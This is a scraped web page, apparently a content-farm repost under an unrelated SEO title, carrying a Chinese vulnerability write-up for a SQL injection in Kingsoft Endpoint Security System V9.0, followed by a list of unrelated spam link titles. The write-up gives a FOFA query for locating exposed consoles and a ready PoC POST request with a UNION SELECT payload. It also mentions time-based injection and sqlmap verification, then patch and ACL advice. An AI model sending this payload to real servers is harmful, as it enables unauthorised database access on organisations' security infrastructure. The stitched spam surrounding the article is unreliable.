当前位置: 首页 > news >正文

云工厂网站建设网站建设的公司资质

云工厂网站建设,网站建设的公司资质,全国做网站的公司,汕头seo优化项目0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品#xff0c;针对恶意软件、病毒和外部攻击提供防范措施#xff0c;帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞#xff0c;该…0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品针对恶意软件、病毒和外部攻击提供防范措施帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞。 0x03 影响范围 金山终端安全系统V9.SP1.E1008 0x04 复现环境 FOFAtitle用户登录-金山终端安全系统V9.0Web控制台 0x05 漏洞复现 PoC POST /inter/update_software_info_v2.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedtype-1UNIONSELECT1,user(),3,4,5,6,7,8--keypageCount0curPage 查询当前用户 延时注入 Sqlmap验证  数据包放txt里面 POST /inter/update_software_info_v2.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedtype-100*keypageCount0curPage0x06 修复建议  升级修复方案 官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站更新版本至新版本。https://www.ejinshan.net/lywz/index 临时缓解方案 通过网络ACL策略限制访问来源例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议不要将集权设备的Web管理控制台开放在互联网上并且仅允许可信IP进行访问。
http://www.zqtcl.cn/news/534420/

相关文章:

  • 网站建设需要什么语言学完html怎么做网站
  • 国内外网站建设wordpress评论嵌套样式修改
  • 广州网站制作系统市场监督管理局投诉电话
  • 局域网建网站的详细步骤海南省建设网站的公司
  • 长沙市网站建设推广绵阳网站推广排名
  • 美容手机网站模板招标
  • 怎样用虚拟主机建网站访客可以用微信回复wordpress
  • 什么做网站做个网站一般要多少钱啊做网站界面尺寸
  • 装修网站怎样做网站中如何做图片轮播
  • 未备案网站如何加cdn河北网站制作
  • 出版社网站建设方案微信公众号h5网站开发
  • 南京建行网站云主机开网站教程
  • 炫酷表白网站在线制作微网站栏目图标
  • 西安做兼职网站设计昆山做网站的公司有哪些
  • vue手机网站开发买域名价格
  • 济南网站推广优化外包合肥住房和城乡建设部网站
  • 商品定制平台网站江苏港口建设费申报网站
  • 仿站酷网站模板网站建设捌金手指花总六
  • 南通网站建设计划书抖音关键词seo系统
  • 怎么做服务器网站下载链接生产类营销型网站
  • 做网站网站内容怎么找微信公众号免费做影视网站
  • 投资公司网站建设意义做一个网站成本大概多少钱
  • 网站建设的简洁性wordpress积分换购
  • 手机网站赏析做外贸女装有哪些网站有哪些
  • 网站建设与管理考察报告建材网站开发
  • 张家港专业做网站网站点击量 哪里查询
  • 网站设计软件开发论文网站建设的参考文献
  • 专业建筑工程网站陇西做网站的公司
  • 请别人做网站会不会被盗有创意的广告图片及赏析
  • qq官方网站在家有电脑怎么做网站